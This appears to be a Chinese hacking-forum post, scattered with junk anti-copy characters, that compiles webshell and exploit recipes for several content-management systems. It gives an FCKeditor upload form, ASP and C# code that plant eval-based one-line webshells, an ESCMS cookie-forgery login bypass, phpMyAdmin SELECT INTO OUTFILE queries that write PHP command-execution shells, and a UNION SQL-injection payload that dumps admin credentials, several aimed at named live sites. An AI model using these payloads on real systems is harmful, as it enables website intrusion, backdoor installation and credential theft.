<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post"># S. q' L1 s) H, n! b+ N
Upload a new file:<br>" h# Q* K+ A7 s; s6 B T
<input type="file" name="NewFile" size="50"><br>
6 I/ v# @- R' {+ P$ H0 s8 b<input id="btnUpload" type="submit" value="Upload">
- X+ d; z; [& O* G, i# _* T</form>
5 W8 S. V8 Y, k1 J3 _8 b-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 r% I' A% s, c9 f0 x7 j. V/ G0 r$ t+ V' L) o4 m$ ] L s
SDcms 后台拿webshell& x# a( R- w) A; k9 |
% g. ~$ e* C, ], f/ `
第一种方法:
3 x# M b! i5 Y# z进入后台-->系统管理-->系统设置-->系统设置->网站名称;* s l5 ^4 v* C8 z" P& x7 v+ j- x1 |
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
4 k- p$ N9 h7 W+ G用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
# d6 M' O; V% W7 ]1 b h0 q X第二种方法:! g5 p0 S+ h( B6 H
进入后台-->系统管理-->系统设置-->系统设置->上传设置;9 S/ z3 l; O' ~9 u7 G% Z
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!& w$ b2 S" ~- D
第三种方法:
/ k4 T3 n/ A- i0 Y2 ]6 j进入后台-->界面管理-->模板文件管理-->创建文件& \; M0 H& a$ U5 b
文件名写入getshell.ashx# i& X0 P) ^7 g* ^
内容写入下面内容:
, b! m5 I ~$ M5 {/====================复制下面的=========================// ~# B5 j/ {2 v% D: e/ a
<%@ WebHandler Language="C#" Class="Handler" %>6 F) r1 x* y: J) ~% m
using System;
1 f r) C( e7 x2 N! `using System.Web;
% w4 @( s: S9 U! {, c; M' f% Xusing System.IO;; O* E$ W4 y: a- s' x
public class Handler : IHttpHandler {0 c/ @4 N# o4 ?) c
public void ProcessRequest (HttpContext context) {
% Y: s: z* \/ n- K9 b" x6 Ccontext.Response.ContentType = "text/plain";
: |6 B1 h0 C/ _' r9 A: k3 fStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
, }' r3 Q8 V1 T' v6 w; ?2 j- M, u) nfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
0 l6 Q* K F# @0 lfile1.Flush();
6 a* X- S. N9 l- ] G1 Wfile1.Close();
& T- P! V% \% g9 }9 x}9 M5 x# Q4 i5 t: h4 a9 i
public bool IsReusable {
5 A! z. r; y) e8 c$ qget {9 C+ |3 k# |4 ?9 k5 y
return false;( @, c) y( `4 ]( Z" P( t
}- k: W$ J1 j( Q
}* ~; g U3 S3 O, A
}$ h6 J/ X8 F |& z
/=============================================/4 r4 U4 R2 E% n& s Q$ a
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx' J5 \# j$ J. {3 ?) Y
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
# j0 M& |& K2 d# F, N% Y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 f! w2 x# b# X4 p; O. a7 ?* A9 H, R2 p$ e- j
ESCMS网站管理系统0day9 P- a' f0 S4 u& r @( [3 J& o
" N, ~8 }: m3 [; H% Z, f6 i后台登陆验证是通过admin/check.asp实现的, p. B; |7 P; ]. a
7 g! a* Z: I& q: D
首先我们打开http://target.com/admin/es_index.html" D5 ]: o2 p0 d2 ~, k
然后在COOKIE结尾加上6 T, [2 G, m, Z3 W H
; ESCMS$_SP2=ES_admin=st0p;' n2 x* t5 L/ q1 F. @6 ]
修改,然后刷新
0 B' O9 @+ a, E5 v进后台了嘎..7 ^2 F2 E4 S9 I+ `& x; \
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
) o8 w8 u4 B+ U* L+ D/ h# s+ c9 N' B! i' ~2 n# K4 d; c/ H) m
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.3 x! f0 r/ k+ {6 I- T$ N
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp3 |& ~* E% f8 U8 M% y# |
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..+ z! P/ l# |& P8 b, o' w( E* A$ u* d
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
& g1 c/ T Z% f% A' `8 ~# m c------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; i$ r7 q! K2 D8 ?4 f2 N" j6 Y: A7 E0 B! E4 f" }! E4 i
宁志网站管理系统后台无验证漏洞及修复' d3 l* E8 ?* H+ g; ]
3 {- W4 U: p6 y5 M: ~
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
% [5 d" ~. @& E/ o5 k E, H; m官方网站:www.ningzhi.net
4 ^! ~4 g+ L& U2 z7 h9 Y8 L学校网站管理系统 V.2011版本 ! f4 v" C' B3 `* {2 f E: C
http://down.chinaz.com/soft/29943.htm
6 O: `) Q9 W4 l! ^' C I X其它版本(如:政府版等),自行下载., F3 E0 O0 \: a! m$ r5 \% t
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
& y* _4 F+ E; Q: h( L- slogin.asp代码如下:
& E, ?/ \! R5 l$ ?7 J# U; |<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> % \* A3 ?) q3 P1 t
manage.asp代码我就不帖出来了.反正也没验证.) a5 D! D' l$ {
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
/ D. @. S: t# c; ~1 p3 F漏洞利用:; }- y9 s: J8 F, `+ e+ b/ R
直接访问http://www.0855.tv/admin/manage.asp
1 p8 |) ^4 p2 P' B数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web53 ~! \6 j0 D/ ?/ Y% {) k8 l% Y
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, e) {2 g) `1 L1 ^
5 Q+ |% w! F* ^2 L5 P9 d0 mphpmyadmin拿shell的四种方法总结及修复' X' i Y6 D+ ^1 @2 o( ^
) e4 y) v! p5 l' \方法一:
Z& ^+ G' o E @0 f N% R0 ]CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
! S% Q/ l# k4 D: \- DINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');# H- s: z& k. n1 C/ ~$ R+ z2 O
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
4 w8 V; ]3 i! U5 Y7 f7 P----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php) h! R7 L0 {3 o/ [% d4 [5 l
一句话连接密码:7on
) I/ e; n, y9 y; L: @' v( J方法二:8 O( I& K' @% ~5 K. r* I0 C
读取文件内容: select load_file('E:/xamp/www/s.php');! B; r/ F# T. \0 s
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'; _% j5 d% f1 ~* a- Y
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'2 M. ?/ f5 N% O7 m
方法三:
2 p) Q7 h* f+ J; h' K+ vJhackJ版本 PHPmyadmin拿shell5 f2 T* d+ S# Q
Create TABLE study (cmd text NOT NULL);
' _3 t$ l& b" BInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
- Y; ^8 @1 A1 R; K+ Cselect cmd from study into outfile 'E:/wamp/www/7.php';
3 d' q" P7 @8 F; l' d! d( N. ~' kDrop TABLE IF EXISTS study;6 \2 F [. @/ R' u9 E
<?php eval($_POST[cmd])?>
) ?8 f' m: b V: y. ?CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
8 j: d) i( |; l3 b( l+ G* CINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
2 d5 H2 O6 V# c1 USELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1/ S( y) D$ T( B+ F7 Y
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。8 I/ E; q9 k `4 U1 v. g6 p2 V
方法四:5 y, j1 n6 L' y0 B5 I+ U' f# l' }1 U5 k
select load_file('E:/xamp/www/study.php');
/ f: c2 a' a- u9 B5 K" F5 ]; mselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'' L& ~! J. j9 R9 y( G4 ~
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
4 b' i7 l2 r M u8 v( a$ O-----------------------------------------------------------------------------------------------------------------------------------------------------------------------( \8 M j( \6 E Z! C5 F% c7 H
7 t1 H0 `- |3 q/ w/ p5 LNO.001中学网站管理系统 Build 110628 注入漏洞
$ N1 [; \/ ^( u: c, r3 |
5 o/ m$ v t" o! `3 HNO.001中学网站管理系统功能模块:
2 h9 @+ u( d0 R) v$ f M* _$ o1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
7 C, E8 }) |. U' D2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息0 x0 \: k5 o8 d# e r
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
" ^+ I9 M( Y* F' [4.视频图片管理:一级分类,动态添加视频或者图片等信息
- N. k: m' f. V9 x: b! i* }" \5.留言管理:对留言,修改,删除、回复等管理
5 f, P8 h. @6 f* C( x6.校友频道:包括校友资料excel导出、管理等功能
- k2 T/ x3 S& F, d" M/ i7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页/ c4 b! H6 b/ X8 D* U( s
默认后台:admin/login.asp
3 @. N: }, x0 G4 J8 U! T& n. Y" {官方演示:http://demo.001cms.net
1 P( Y' M# o( s& q$ B源码下载地址:http://down.chinaz.com/soft/30187.htm3 V4 s/ e7 z6 C5 n
EXP:' s+ Z( k4 N/ ]- b3 {
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
8 F1 k$ {9 o; V1 J; C/ z) n. V测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! ^% T' g) D2 R. u' K: egetshell:后台有备份,你懂的
7 @. U3 x3 o6 h另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
. l1 _$ V5 Y% g------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对